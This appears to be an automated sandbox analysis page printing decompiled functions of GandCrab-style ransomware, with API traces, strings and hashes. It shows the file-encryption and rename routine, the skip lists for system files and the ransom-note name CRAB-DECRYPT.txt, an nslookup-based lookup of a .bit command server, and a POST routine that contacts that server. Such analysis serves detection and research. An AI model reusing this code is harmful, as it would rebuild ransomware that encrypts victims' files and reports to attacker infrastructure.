									SetFilePointer(_v28,  ~_v48, 0, 1);
									if(WriteFile(_v28, _t149, _v8,  &_v16, 0) == 0) {
										_t168 = 1;
										_v36 = 1;
									}
									VirtualFree(_t149, 0, 0x8000);
									_t147 = _v28;
									if(_t168 == 0) {
										_t107 = _v12;
										continue;
									}
								}
								break;
							}
							VirtualFree(_v12, 0, 0x8000);
							if(_v36 == 0) {
								WriteFile(_t147, _v24, 0x100,  &_v16, 0);
								WriteFile(_t147, _v60, 0x100,  &_v16, 0);
								WriteFile(_t147, _t164, 0x10,  &_v16, 0);
							}
							CloseHandle(_t147);
							_v40 =  *_t164;
							VirtualFree(_t164, 0, 0x8000);
							VirtualFree(_v24, 0, 0x8000);
							VirtualFree(_v60, 0, 0x8000);
							if(_v36 == 0) {
								MoveFileW(_v52, _v56);
							}
							_t165 = _v40;
						} else {
							VirtualFree(_t163, 0, 0x8000);
							VirtualFree(_v24, 0, 0x8000);
							asm("xorps xmm0, xmm0");
							asm("movlpd [ebp-0x28], xmm0");
							_t165 = _v44;
						}
					} else {
						GetLastError();
						asm("xorps xmm0, xmm0");
						asm("movlpd [ebp-0x28], xmm0");
						_t165 = _v44;
					}
				} else {
					MessageBoxA(_t99, "Fatal error: rsaenh.dll is not initialized as well", "Fatal error", 0x10);
					asm("xorps xmm0, xmm0");
					asm("movlpd [ebp-0x28], xmm0");
					_t165 = _v44;
				}
				VirtualFree(_v56, 0, 0x8000);
				return _t165;
			}

APIs

GetFileAttributesW.KERNEL32(00000000,00000010,00000000,00000000), ref: 0FE637C4
SetFileAttributesW.KERNEL32(00000000,00000000), ref: 0FE637CF
VirtualAlloc.KERNEL32(00000000,00000401,00003000,00000040,00000000,00000000,00000000,?), ref: 0FE6380A
lstrcpyW.KERNEL32 ref: 0FE63828
lstrcatW.KERNEL32(00000000,0043002E), ref: 0FE63833

Part of subcall function 0FE68400: CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000,00000000,00000000,00000000), ref: 0FE68420
Part of subcall function 0FE68400: VirtualAlloc.KERNEL32(00000000,00000007,00003000,00000040), ref: 0FE68448
Part of subcall function 0FE68400: GetModuleHandleA.KERNEL32(?), ref: 0FE6849D
Part of subcall function 0FE68400: LoadLibraryA.KERNEL32(Advapi32.dll), ref: 0FE684AB
Part of subcall function 0FE68400: GetProcAddress.KERNEL32(00000000,CryptGenRandomAdvapi32.dll), ref: 0FE684BA
Part of subcall function 0FE68400: CryptReleaseContext.ADVAPI32(?,00000000), ref: 0FE684DE
Part of subcall function 0FE68400: VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0FE684EC

Part of subcall function 0FE68400: CryptReleaseContext.ADVAPI32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,0FE6292B), ref: 0FE68500
Part of subcall function 0FE68400: VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,?,?,?,0FE6292B), ref: 0FE6850E

VirtualAlloc.KERNEL32(00000000,00000800,00003000,00000004), ref: 0FE63896
VirtualAlloc.KERNEL32(00000000,00000800,00003000,00000004), ref: 0FE638C1

Part of subcall function 0FE66660: EnterCriticalSection.KERNEL32(0FE72A48,?,0FE638F4,00000000,00000000,00000000,?,00000800), ref: 0FE6666B
Part of subcall function 0FE66660: CryptAcquireContextW.ADVAPI32(00000000,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,F0000000,?,0FE638F4,00000000,00000000,00000000), ref: 0FE66691
Part of subcall function 0FE66660: GetLastError.KERNEL32(?,0FE638F4,00000000,00000000,00000000), ref: 0FE6669B
Part of subcall function 0FE66660: CryptAcquireContextW.ADVAPI32(00000000,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008,?,0FE638F4,00000000,00000000,00000000), ref: 0FE666B7

MessageBoxA.USER32 ref: 0FE63908
GetLastError.KERNEL32 ref: 0FE63943
VirtualFree.KERNEL32(?,00000000,00008000), ref: 0FE63BB2

Strings

Fatal error, xrefs: 0FE638FD
Fatal error: rsaenh.dll is not initialized as well, xrefs: 0FE63902
B, xrefs: 0FE63821
., xrefs: 0FE6380E
R, xrefs: 0FE6381A
, xrefs: 0FE638DA

Memory Dump Source

Source File: 00000004.00000002.383034284.000000000FE61000.00000020.00000001.01000000.00000004.sdmp, Offset: 0FE60000, based on PE: true

Associated: 00000004.00000002.383030160.000000000FE60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.383041261.000000000FE6A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.383047915.000000000FE72000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.383052166.000000000FE74000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_fe60000_ssapst.jbxd

Yara matches

Similarity

API ID: Virtual$ContextCrypt$Alloc$AcquireFree$AttributesErrorFileLastRelease$AddressCriticalEnterHandleLibraryLoadMessageModuleProcSectionlstrcatlstrcpy
String ID: $.$B$Fatal error$Fatal error: rsaenh.dll is not initialized as well$R
API String ID: 1177701972-4284454829
Opcode ID: fa5bc455235d9f309bf26f22316b1be93f55f8f476e9c5a7015aefee2db766b5
Instruction ID: 16b0ef9dadd1afca2eab6e7bcb93990e83c5cfe25759ac2d507dcc58d4057c3d
Opcode Fuzzy Hash: fa5bc455235d9f309bf26f22316b1be93f55f8f476e9c5a7015aefee2db766b5
Instruction Fuzzy Hash: 1BC17EB1E8030DABEB118F94DC45FEEBBB8FF08B54F205125F640BA281DBB469548B54

Uniqueness

Uniqueness Score: -1.00%

Function 0FE65060 Relevance: 61.4, APIs: 8, Strings: 27, Instructions: 118
pipememoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0FE65060(CHAR* __ecx, void* __edx, WCHAR* _a4) {
				struct _SECURITY_ATTRIBUTES _v16;
				short _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				char _v72;
				short _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				char _v128;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t43;
				void* _t55;
				CHAR* _t62;
				void* _t64;

				_v72 = 0x73006e;
				_t55 = __edx;
				_v20 = 0;
				_t62 = __ecx;
				_v76 = 0;
				_v68 = 0x6f006c;
				_t41 =  !=  ?  &_v128 :  &_v72;
				_v64 = 0x6b006f;
				_a4 =  !=  ?  &_v128 :  &_v72;
				_v60 = 0x700075;
				_v56 = 0x250020;
				_v52 = 0x200053;
				_v48 = 0x73006e;
				_v44 = 0x2e0031;
				_v40 = 0x690076;
				_v36 = 0x6d0072;
				_v32 = 0x630061;
				_v28 = 0x2e0068;
				_v24 = 0x750072;
				_v128 = 0x73006e;
				_v124 = 0x6f006c;
				_v120 = 0x6b006f;
				_v116 = 0x700075;
				_v112 = 0x250020;
				_v108 = 0x200053;
				_v104 = 0x73006e;
				_v100 = 0x2e0032;
				_v96 = 0x690076;
				_v92 = 0x6d0072;
				_v88 = 0x630061;
				_v84 = 0x2e0068;
				_v80 = 0x750072;
				_v16.nLength = 0xc;
				_v16.bInheritHandle = 1;
				_v16.lpSecurityDescriptor = 0;
				_t43 = CreatePipe(0xfe72a70, 0xfe72a6c,  &_v16, 0);
				if(_t43 != 0) {
					_t43 = SetHandleInformation( *0xfe72a70, 1, 0);
					if(_t43 == 0) {
						goto L1;
					} else {
						CreatePipe(0xfe72a68, 0xfe72a74,  &_v16, 0);
						_t43 = SetHandleInformation( *0xfe72a74, 1, 0);
						if(_t43 == 0) {
							goto L1;
						} else {
							_t64 = VirtualAlloc(0, 0x2800, 0x3000, 4);
							if(_t64 == 0) {
								lstrcpyA(_t62, "fabian wosar <3");
								return 0;
							} else {
								wsprintfW(_t64, _a4, _t55);
								E0FE64E10(_t64);
								E0FE64FB0(_t55, _t62, _t55, _t62, _t64);
								VirtualFree(_t64, 0, 0x8000);
								return 0;
							}
						}
					}
				} else {
					L1:
					return _t43 | 0xffffffff;
				}
			}

APIs

CreatePipe.KERNEL32(0FE72A70,0FE72A6C,?,00000000,00000001,00000001,00000000), ref: 0FE65165
SetHandleInformation.KERNEL32(00000001,00000000), ref: 0FE65189
CreatePipe.KERNEL32(0FE72A68,0FE72A74,0000000C,00000000), ref: 0FE6519F
SetHandleInformation.KERNEL32(00000001,00000000), ref: 0FE651AF
VirtualAlloc.KERNEL32(00000000,00002800,00003000,00000004), ref: 0FE651C3
wsprintfW.USER32 ref: 0FE651D4
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0FE651F5

Strings

o, xrefs: 0FE65095
l, xrefs: 0FE6508B
l, xrefs: 0FE650FC
a, xrefs: 0FE6513B
h, xrefs: 0FE650E7
r, xrefs: 0FE65134
u, xrefs: 0FE6510A
n, xrefs: 0FE650F5
2, xrefs: 0FE65126
h, xrefs: 0FE65142
o, xrefs: 0FE65103
fabian wosar <3, xrefs: 0FE65204
a, xrefs: 0FE650E0
v, xrefs: 0FE650D2
n, xrefs: 0FE650C4
, xrefs: 0FE650B6
S, xrefs: 0FE650BD
r, xrefs: 0FE650D9
, xrefs: 0FE65111
1, xrefs: 0FE650CB
n, xrefs: 0FE6506D
r, xrefs: 0FE650EE
u, xrefs: 0FE650AF
v, xrefs: 0FE6512D
n, xrefs: 0FE6511F
S, xrefs: 0FE65118
r, xrefs: 0FE65149

Memory Dump Source

Source File: 00000004.00000002.383034284.000000000FE61000.00000020.00000001.01000000.00000004.sdmp, Offset: 0FE60000, based on PE: true

Associated: 00000004.00000002.383030160.000000000FE60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.383041261.000000000FE6A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.383047915.000000000FE72000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.383052166.000000000FE74000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_fe60000_ssapst.jbxd

Yara matches

Similarity

API ID: CreateHandleInformationPipeVirtual$AllocFreewsprintf
String ID: $ $1$2$S$S$a$a$fabian wosar <3$h$h$l$l$n$n$n$n$o$o$r$r$r$r$u$u$v$v
API String ID: 1490407255-3072057902
Opcode ID: cd7f4907459290998af5364cfc09b9f77cf8b25065e4273b0dadcada2c293bd0
Instruction ID: 9641e29ca0e00097d2c71d59e09c7bccdf2470e88703f155eef64d0414c9086f
Opcode Fuzzy Hash: cd7f4907459290998af5364cfc09b9f77cf8b25065e4273b0dadcada2c293bd0
Instruction Fuzzy Hash: 77413CB0E4030CABEB10CF95DC487EEBFB6EB05B59F104129E514BA282D7FA45598F94

Uniqueness

Uniqueness Score: -1.00%

Function 0FE668F0 Relevance: 31.6, APIs: 11, Strings: 10, Instructions: 78
stringCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E0FE668F0(WCHAR* __ecx) {
				int _t4;
				signed int _t5;
				signed int _t15;
				void* _t19;
				WCHAR* _t21;
				short* _t25;
				WCHAR* _t26;

				_t21 = __ecx;
				_t4 = lstrlenW(__ecx);
				_t5 = lstrlenW(_t21);
				_t1 = _t21 - 2; // -2
				_t25 = _t1 + _t5 * 2;
				_t19 = _t4 - 1;
				if(_t19 != 0) {
					do {
						_t25 = _t25 - 2;
						_t19 = _t19 - 1;
					} while ( *_t25 != 0x5c && _t19 != 0);
				}
				_t26 = _t25 + 2;
				if(lstrcmpiW(_t26, L"desktop.ini") != 0) {
					if(lstrcmpiW(_t26, L"autorun.inf") == 0 || lstrcmpiW(_t26, L"ntuser.dat") == 0 || lstrcmpiW(_t26, L"iconcache.db") == 0 || lstrcmpiW(_t26, L"bootsect.bak") == 0 || lstrcmpiW(_t26, L"boot.ini") == 0 || lstrcmpiW(_t26, L"ntuser.dat.log") == 0 || lstrcmpiW(_t26, L"thumbs.db") == 0) {
						goto L5;
					} else {
						_t15 = lstrcmpiW(_t26, L"CRAB-DECRYPT.txt");
						asm("sbb eax, eax");
						return  ~_t15 + 1;
					}
				} else {
					L5:
					return 1;
				}
			}

APIs

lstrlenW.KERNEL32(00000000,00000010,00000000,00000000,0FE66B03), ref: 0FE668FC
lstrlenW.KERNEL32(00000000), ref: 0FE66901
lstrcmpiW.KERNEL32(-00000004,desktop.ini), ref: 0FE6692D
lstrcmpiW.KERNEL32(-00000004,autorun.inf), ref: 0FE66942
lstrcmpiW.KERNEL32(-00000004,ntuser.dat), ref: 0FE6694E
lstrcmpiW.KERNEL32(-00000004,iconcache.db), ref: 0FE6695A
lstrcmpiW.KERNEL32(-00000004,bootsect.bak), ref: 0FE66966
lstrcmpiW.KERNEL32(-00000004,boot.ini), ref: 0FE66972
lstrcmpiW.KERNEL32(-00000004,ntuser.dat.log), ref: 0FE6697E
lstrcmpiW.KERNEL32(-00000004,thumbs.db), ref: 0FE6698A
lstrcmpiW.KERNEL32(-00000004,CRAB-DECRYPT.txt), ref: 0FE66996

Strings

CRAB-DECRYPT.txt, xrefs: 0FE66990
boot.ini, xrefs: 0FE6696C
iconcache.db, xrefs: 0FE66954
ntuser.dat.log, xrefs: 0FE66978
desktop.ini, xrefs: 0FE66927
thumbs.db, xrefs: 0FE66984
bootsect.bak, xrefs: 0FE66960
ntuser.dat, xrefs: 0FE66948
iqt, xrefs: 0FE6691E
autorun.inf, xrefs: 0FE6693C

Memory Dump Source

Source File: 00000004.00000002.383034284.000000000FE61000.00000020.00000001.01000000.00000004.sdmp, Offset: 0FE60000, based on PE: true

Associated: 00000004.00000002.383030160.000000000FE60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.383041261.000000000FE6A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.383047915.000000000FE72000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.383052166.000000000FE74000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_fe60000_ssapst.jbxd

Yara matches

Similarity

API ID: lstrcmpi$lstrlen
String ID: iqt$CRAB-DECRYPT.txt$autorun.inf$boot.ini$bootsect.bak$desktop.ini$iconcache.db$ntuser.dat$ntuser.dat.log$thumbs.db
API String ID: 203586893-3181620209
Opcode ID: 7a89e7ce00c1c4b6e0a04c250c8e01f5b51b8af7519a0fc304c7c5aa3c35d6cf
Instruction ID: 158cbf04643e625d40870c12bc8b0b96de55c34263a14e8c6dab9ae17492e745
Opcode Fuzzy Hash: 7a89e7ce00c1c4b6e0a04c250c8e01f5b51b8af7519a0fc304c7c5aa3c35d6cf
Instruction Fuzzy Hash: 831106627D06AE355A20367DAC01DEF379C5EE1AE83452121FD00F6023FF85EA0247B4

Uniqueness

Uniqueness Score: -1.00%

Function 0FE66780 Relevance: 28.1, APIs: 7, Strings: 9, Instructions: 124
memoryCOMMON

Download Yara Rule

C-Code - Quality: 19%

			E0FE66780(void* __ecx) {
				void* _t12;
				intOrPtr* _t23;
				void* _t51;
				void* _t52;

				_t52 = __ecx;
				_t51 = VirtualAlloc(0, 0x201, 0x3000, 0x40);
				if(E0FE681F0(_t52, L"\\ProgramData\\") != 0 || E0FE681F0(_t52, L"\\IETldCache\\") != 0 || E0FE681F0(_t52, L"\\Boot\\") != 0 || E0FE681F0(_t52, L"\\Program Files\\") != 0 || E0FE681F0(_t52, L"\\Tor Browser\\") != 0 || E0FE681F0(_t52, L"Ransomware") != 0 || E0FE681F0(_t52, L"\\All Users\\") != 0 || E0FE681F0(_t52, L"\\Local Settings\\") != 0) {
					L18:
					VirtualFree(_t51, 0, 0x8000);
					return 0;
				} else {
					_t12 = E0FE681F0(_t52, L"\\Windows\\");
					if(_t12 != 0) {
						goto L18;
					} else {
						_t23 = __imp__SHGetSpecialFolderPathW;
						_push(_t12);
						_push(0x2a);
						_push(_t51);
						_push(_t12);
						if( *_t23() == 0 || E0FE681F0(_t52, _t51) == 0) {
							_push(0);
							_push(0x2b);
							_push(_t51);
							_push(0);
							if( *_t23() == 0 || E0FE681F0(_t52, _t51) == 0) {
								_push(0);
								_push(0x24);
								_push(_t51);
								_push(0);
								if( *_t23() == 0 || E0FE681F0(_t52, _t51) == 0) {
									_push(0);
									_push(0x1c);
									_push(_t51);
									_push(0);
									if( *_t23() == 0 || E0FE681F0(_t52, _t51) == 0) {
										VirtualFree(_t51, 0, 0x8000);
										return 1;
									} else {
										goto L18;
									}
								} else {
									goto L18;
								}
							} else {
								goto L18;
							}
						} else {
							goto L18;
						}
					}
				}
			}

APIs

VirtualAlloc.KERNEL32(00000000,00000201,00003000,00000040,00000000,?,?,0FE66E06,00000000,?,?), ref: 0FE66793
SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000002A,00000000,?,?,0FE66E06,00000000,?,?), ref: 0FE6685A
SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000002B,00000000,?,?,0FE66E06,00000000,?,?), ref: 0FE66874
SHGetSpecialFolderPathW.SHELL32(00000000,00000000,00000024,00000000,?,?,0FE66E06,00000000,?,?), ref: 0FE6688E
SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001C,00000000,?,?,0FE66E06,00000000,?,?), ref: 0FE668A8
VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,0FE66E06,00000000,?,?), ref: 0FE668C8
VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,0FE66E06,00000000,?,?), ref: 0FE668DD

Strings

\ProgramData\, xrefs: 0FE66799
\IETldCache\, xrefs: 0FE667AF
\All Users\, xrefs: 0FE66813
\Program Files\, xrefs: 0FE667D7
\Windows\, xrefs: 0FE6683B
\Tor Browser\, xrefs: 0FE667EB
\Boot\, xrefs: 0FE667C3
Ransomware, xrefs: 0FE667FF
\Local Settings\, xrefs: 0FE66827

Memory Dump Source

Source File: 00000004.00000002.383034284.000000000FE61000.00000020.00000001.01000000.00000004.sdmp, Offset: 0FE60000, based on PE: true

Associated: 00000004.00000002.383030160.000000000FE60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.383041261.000000000FE6A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.383047915.000000000FE72000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.383052166.000000000FE74000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_fe60000_ssapst.jbxd

Yara matches

Similarity

API ID: FolderPathSpecial$Virtual$Free$Alloc
String ID: Ransomware$\All Users\$\Boot\$\IETldCache\$\Local Settings\$\Program Files\$\ProgramData\$\Tor Browser\$\Windows\
API String ID: 1363212851-3735464813
Opcode ID: 07637ed39bd73cb24103e30357c404ab9254a7b881e1f3bbcd4ae3dbdf623fb2
Instruction ID: 4cf1bed6ec28eeb7ba50b1acfaa18d05a63ef87d65a4b1fcab1076b7820a77d4
Opcode Fuzzy Hash: 07637ed39bd73cb24103e30357c404ab9254a7b881e1f3bbcd4ae3dbdf623fb2
Instruction Fuzzy Hash: E4310C207D476D23ED2423761D15B2F559A8FC5AD9F507026EA01EE2C3FF58ED0283AA

Uniqueness

Uniqueness Score: -1.00%

Function 0FE65220 Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 91
memorystringsleepCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E0FE65220() {
				WCHAR* _v8;
				intOrPtr _v12;
				char _v16;
				intOrPtr _v20;
				char _v24;
				char* _v28;
				char* _v32;
				char* _v36;
				short _v40;
				char _v56;
				short _v60;
				intOrPtr _v64;
				char _v80;
				WCHAR* _t26;
				intOrPtr _t27;
				long _t32;
				WCHAR* _t37;
				void* _t39;
				signed int _t40;
				signed int _t41;
				signed int _t45;
				void* _t48;
				WCHAR* _t49;
				void* _t52;
				void* _t53;

				asm("movdqa xmm0, [0xfe70540]");
				_v36 =  &_v56;
				asm("movdqu [ebp-0x34], xmm0");
				_v32 =  &_v80;
				asm("movdqa xmm0, [0xfe70520]");
				_v40 = 0x74;
				asm("movdqu [ebp-0x4c], xmm0");
				_v64 = 0x69622e6d;
				_v60 = 0x74;
				_v24 = 0x62636467;
				_v20 = 0x7469622e;
				_v16 = 0;
				_v28 =  &_v24;
				_t26 = VirtualAlloc(0, 0x100, 0x3000, 4);
				_t37 = _t26;
				_v8 = _t37;
				if(_t37 != 0) {
					_t40 = 0;
					_t48 = 1;
					_t45 = 0;
					while(1) {
						_t27 =  *((intOrPtr*)(_t52 + _t45 * 4 - 0x20));
						_t45 = _t45 + 1;
						_v12 = _t27;
						if(_t45 == 3) {
							asm("sbb esi, esi");
							_t48 =  ~(_t48 - 1) + 2;
							_t45 = 0;
						}
						if(_t40 == 0xffffffff) {
							Sleep(0x3e8);
						}
						_t39 = VirtualAlloc(0, 2 + lstrlenW(_t37) * 2, 0x3000, 4);
						_t41 = _t39;
						E0FE65060(_t41, _v12, _t48);
						_t53 = _t53 + 4;
						_t32 = lstrcmpiA(_t39, "fabian wosar <3");
						if(_t32 != 0) {
							break;
						}
						VirtualFree(_t39, _t32, 0x8000);
						_t37 = _v8;
						_t40 = _t41 | 0xffffffff;
					}
					_t49 = _v8;
					wsprintfW(_t49, L"%S", _t39);
					VirtualFree(_t39, 0, 0x8000);
					_t26 = _t49;
				}
				return _t26;
			}

APIs

VirtualAlloc.KERNEL32(00000000,00000100,00003000,00000004,00000000,00000000,00000000), ref: 0FE65288
Sleep.KERNEL32(000003E8), ref: 0FE652C5
lstrlenW.KERNEL32(00000000,00003000,00000004), ref: 0FE652D3
VirtualAlloc.KERNEL32(00000000,00000000), ref: 0FE652E3
lstrcmpiA.KERNEL32(00000000,fabian wosar <3), ref: 0FE652FF
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0FE65310
wsprintfW.USER32 ref: 0FE65328
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0FE65339

Strings

t, xrefs: 0FE6525B
.bit, xrefs: 0FE6527A
t, xrefs: 0FE6526D
gdcb, xrefs: 0FE65273
fabian wosar <3, xrefs: 0FE652F9
m.bi, xrefs: 0FE65266

Memory Dump Source

Source File: 00000004.00000002.383034284.000000000FE61000.00000020.00000001.01000000.00000004.sdmp, Offset: 0FE60000, based on PE: true

Associated: 00000004.00000002.383030160.000000000FE60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.383041261.000000000FE6A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.383047915.000000000FE72000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.383052166.000000000FE74000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_fe60000_ssapst.jbxd

Yara matches

Similarity

API ID: Virtual$AllocFree$Sleeplstrcmpilstrlenwsprintf
String ID: .bit$fabian wosar <3$gdcb$m.bi$t$t
API String ID: 2709691373-2847225850
Opcode ID: ab92756926ed50f0f1c1e8242929dfa47e580ae93b41cd3fe15e6905a960c953
Instruction ID: d341d2ad9c99ce60f486a8e28ed0f16ce969cf60506caa64e3876edc8e5e05ce
Opcode Fuzzy Hash: ab92756926ed50f0f1c1e8242929dfa47e580ae93b41cd3fe15e6905a960c953
Instruction Fuzzy Hash: E13107B1E4030DABDB10CFA5ED85BAEBBB8FF45B65F101125F605B6281DB785A008B90

Uniqueness

Uniqueness Score: -1.00%

Function 0FE654F0 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 117
stringmemorynetworkCOMMON

Download Yara Rule

C-Code - Quality: 22%

			E0FE654F0(CHAR* __ecx, CHAR** __edx, intOrPtr _a8) {
				void* _v8;
				CHAR* _v12;
				void* _v16;
				CHAR** _v20;
				void* _v24;
				char _v28;
				short _v124;
				void* _t40;
				CHAR* _t44;
				CHAR* _t46;
				void* _t47;
				void* _t55;
				void* _t56;
				CHAR* _t58;
				void* _t59;

				_t46 = __ecx;
				_v20 = __edx;
				_v12 = __ecx;
				E0FE67E40( &_v28);
				_v16 = E0FE65220();
				_t55 = 0x400 + lstrlenA(_t46) * 2;
				_t7 = _t55 + 1; // 0x1
				_t47 = VirtualAlloc(0, _t7, 0x3000, 0x40);
				_v8 = VirtualAlloc(0, 0x32001, 0x3000, 0x40);
				if(_t47 == 0) {
					L3:
					_t58 = 0;
					L4:
					lstrcatA(_t58, _v12);
					asm("movdqu xmm0, [0xfe6fb40]");
					asm("movdqu [ebp-0x78], xmm0");
					asm("movdqu xmm0, [0xfe6fb50]");
					asm("movdqu [ebp-0x68], xmm0");
					asm("movdqu xmm0, [0xfe6fb60]");
					asm("movdqu [ebp-0x58], xmm0");
					asm("movdqu xmm0, [0xfe6fb70]");
					asm("movdqu [ebp-0x48], xmm0");
					asm("movdqu xmm0, [0xfe6fb80]");
					asm("movdqu [ebp-0x38], xmm0");
					asm("movdqu xmm0, [0xfe6fb90]");
					asm("movdqu [ebp-0x28], xmm0");
					lstrlenA(_t58);
					_t56 = 0;
					_push(lstrlenW( &_v124));
					_push( &_v124);
					_push(L"POST");
					_push(0x31fff);
					_push(_v8);
					_push(lstrlenA(_t58));
					_push(_t58);
					_t59 = _v16;
					_push(L"popkadurak");
					_push(_t59);
					if(E0FE68050( &_v28) != 0) {
						_t56 = 1;
						if(_a8 != 0) {
							_v12 = 0;
							if(E0FE653D0(_v8,  &_v12) == 0) {
								_t56 = 0;
							} else {
								_t44 = _v12;
								if(_t44 != 0) {
									 *_v20 = _t44;
								}
							}
						}
					}
					VirtualFree(_t59, 0, 0x8000);
					VirtualFree(_v8, 0, 0x8000);
					VirtualFree(_t47, 0, 0x8000);
					_t40 = _v24;
					if(_t40 != 0) {
						InternetCloseHandle(_t40);
					}
					return _t56;
				}
				_t9 = _t55 + 1; // 0x1
				if(_t55 >= _t9) {
					goto L3;
				} else {
					_t58 = _t47;
					goto L4;
				}
			}

APIs

Part of subcall function 0FE67E40: InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0FE68024
Part of subcall function 0FE67E40: InternetOpenW.WININET(006F004D,00000001,00000000,00000000,10000000), ref: 0FE6803D

Part of subcall function 0FE65220: VirtualAlloc.KERNEL32(00000000,00000100,00003000,00000004,00000000,00000000,00000000), ref: 0FE65288
Part of subcall function 0FE65220: Sleep.KERNEL32(000003E8), ref: 0FE652C5
Part of subcall function 0FE65220: lstrlenW.KERNEL32(00000000,00003000,00000004), ref: 0FE652D3
Part of subcall function 0FE65220: VirtualAlloc.KERNEL32(00000000,00000000), ref: 0FE652E3
Part of subcall function 0FE65220: lstrcmpiA.KERNEL32(00000000,fabian wosar <3), ref: 0FE652FF
Part of subcall function 0FE65220: VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0FE65310
Part of subcall function 0FE65220: wsprintfW.USER32 ref: 0FE65328
Part of subcall function 0FE65220: VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0FE65339

lstrlenA.KERNEL32(00000000,00000000,00000000,74716980), ref: 0FE65512
VirtualAlloc.KERNEL32(00000000,00000001,00003000,00000040), ref: 0FE65532
VirtualAlloc.KERNEL32(00000000,00032001,00003000,00000040), ref: 0FE65544
lstrcatA.KERNEL32(00000000,?), ref: 0FE6555E
lstrlenA.KERNEL32(00000000), ref: 0FE655B3
lstrlenW.KERNEL32(?), ref: 0FE655BF
lstrlenA.KERNEL32(00000000,00000000,00031FFF,?,00000000), ref: 0FE655DB
VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,popkadurak,00000000,00000000,?,00000000), ref: 0FE65637
VirtualFree.KERNEL32(00000000,00000000,00008000,?,00000000), ref: 0FE65643
VirtualFree.KERNEL32(00000000,00000000,00008000,?,00000000), ref: 0FE6564D
InternetCloseHandle.WININET(0FE6581B), ref: 0FE65657

Strings

popkadurak, xrefs: 0FE655E9
POST, xrefs: 0FE655CA

Memory Dump Source

Source File: 00000004.00000002.383034284.000000000FE61000.00000020.00000001.01000000.00000004.sdmp, Offset: 0FE60000, based on PE: true

Associated: 00000004.00000002.383030160.000000000FE60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.383041261.000000000FE6A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.383047915.000000000FE72000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.383052166.000000000FE74000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_fe60000_ssapst.jbxd

Yara matches

Similarity

API ID: Virtual$Freelstrlen$Alloc$Internet$Open$CloseHandleSleeplstrcatlstrcmpiwsprintf
String ID: POST$popkadurak
API String ID: 2554059081-2707760125
Opcode ID: e5a1d407507e11589604da57131df7eb8d1562c3607deb6929a0463234bf3f00
Instruction ID: 6a7cabdf212d4ecb8b9d04bd7e673ca4172f50c71e0a4f7bf771c0d1eed97b00
Opcode Fuzzy Hash: e5a1d407507e11589604da57131df7eb8d1562c3607deb6929a0463234bf3f00
Instruction Fuzzy Hash: 37410471E4034EAAEB109FA9DC55FEEBB78FF89795F102115EA00B3141EB786644CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0FE672A0 Relevance: 20.1, APIs: 16, Instructions: 120
stringCOMMON

Download Yara Rule

C-Code - Quality: 93%

